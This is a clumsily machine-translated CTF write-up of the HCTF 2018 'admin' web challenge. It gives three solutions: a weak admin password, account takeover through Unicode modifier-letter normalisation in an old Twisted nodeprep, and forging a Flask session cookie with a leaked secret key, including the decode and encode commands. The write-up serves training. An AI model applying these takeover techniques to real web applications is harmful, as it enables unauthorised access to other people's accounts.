Subject address: https://buuoj.cn/challenges#[HCTF%202018]admin
The first solution: weak password
When prompted, try a weak password to log admin
the user when admin
the password is 123
, the successful landing
The second solution: Unicode spoofing.
Register a user mochu7
at random and Change Password
give the source code of the title in/hctf_flask/app/rotus.py
register
And login
used a custom function for the usernamestrlower()
nodeprep.prepare()
From
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
In requirements.txt
can be seen in Twisted
the version
Twisted
Version 10.2.0
, and the current (2020/10/28) Twisted
The latest version has been 20.3.0
used here in a very old version
10.2.0
version nodeprep.prepare()
of the special Unicode
post-encoding process will get a normal character
, use the following website to find admin
special account Unicode
coding
https: // unicode-table.com/en/search/?q=Modifier+Letter+Capital
ᴬᴰᴹᴵᴺ
Unicode
After encoding
\u1d2c\u1d30\u1d39\u1d35\u1d3a
Characters nodeprep.prepare()
obtained after two processingadmin
You can register an account ᴬᴰᴹᴵᴺ
, and you can nodeprep.prepare()
get it once when you register ADMIN
, and then when nodeprep.prepare()
you change your password, it will be processed a second time, and admin
you can modify your admin
account password when you get it.
The third solution: forged Flask session
As we all know, flask
the session
is stored in the client's cookie
among, and there is no encryption, just do a signature to prevent tampering
User mochu7
'ssession
{
'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py decode -s 'ckj123' -c '.eJw9kMGKwkAQRH9l6bOHZOKyEPAQGM0a6A66o2HmIm6MTjqJQlQ0I_77Di54rup61fWAzb6vzhbiS3-tRrCpdxA_4OMXYtAi68gtHLrVXatVoDvtTLpu8pQsMgYocEyy_DRS30w6HbwvJLYWpRakDoNJMcrlNPC3Y-Ilo0oEKtvkcteimN5R6MhIjIzSAfEiIJcMJG2rO89kdMSJ88SGipUj1XhvxoYzRrmsUZbOyEXo85gUTuA5gvLc7zeXU1Md3y-Q8-iUWizmg-FZ7XF38nXQrVvkxNfKau3KEFnfSMwdFhjpw-QVV3fbQ_VOUt-znyL5V47bzgvQnUp7_YIRXM9V_xoOwgCef1nZbOI.X5k9pg.ErECKkJ7jz7qU_-NGQSWFDgTq98'
{
'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}
Forgery session
also needs to know secret key
, you can find it by searching the source code folder globally
secret key
forckj123
Amended name
toadmin
{
'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}
Encrypting get admin
thesession
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}"
.eJw9kMGKwkAQRH9l6bOHZOJeBA-B0ayBbtEdDTOX4MZo0klciIqmxX_fwQXPVV2vuh6QH_ryXMHk0l_LEeT1HiYP-PiBCViVdiQrQdncrdkEtrPikm2zTKhCxgAVjkkXn07bm0tmg_eFxFWF2ioyx8ElGC31LPC3Y-I1o4kVmqpZ6n2LanZHZSOnMXLGBsSrgCQeSFet7TyTUYhj8cSGso2Qabw3Zccpo17XqAtxehX6PCaDU3iOoDj3h_zy25Sn9wskHp1Qi9licDyvPe5Ovg7KtkWOfa20tlKEyPZGaiGYYWSP01dc3e2O5TvJfM2_s_hfOe06L8Bu39UnGMH1XPav3SAM4PkH7IhsmA.X5k-3w.1NeZXj_XVt-fu-MQxsTtdPuBZws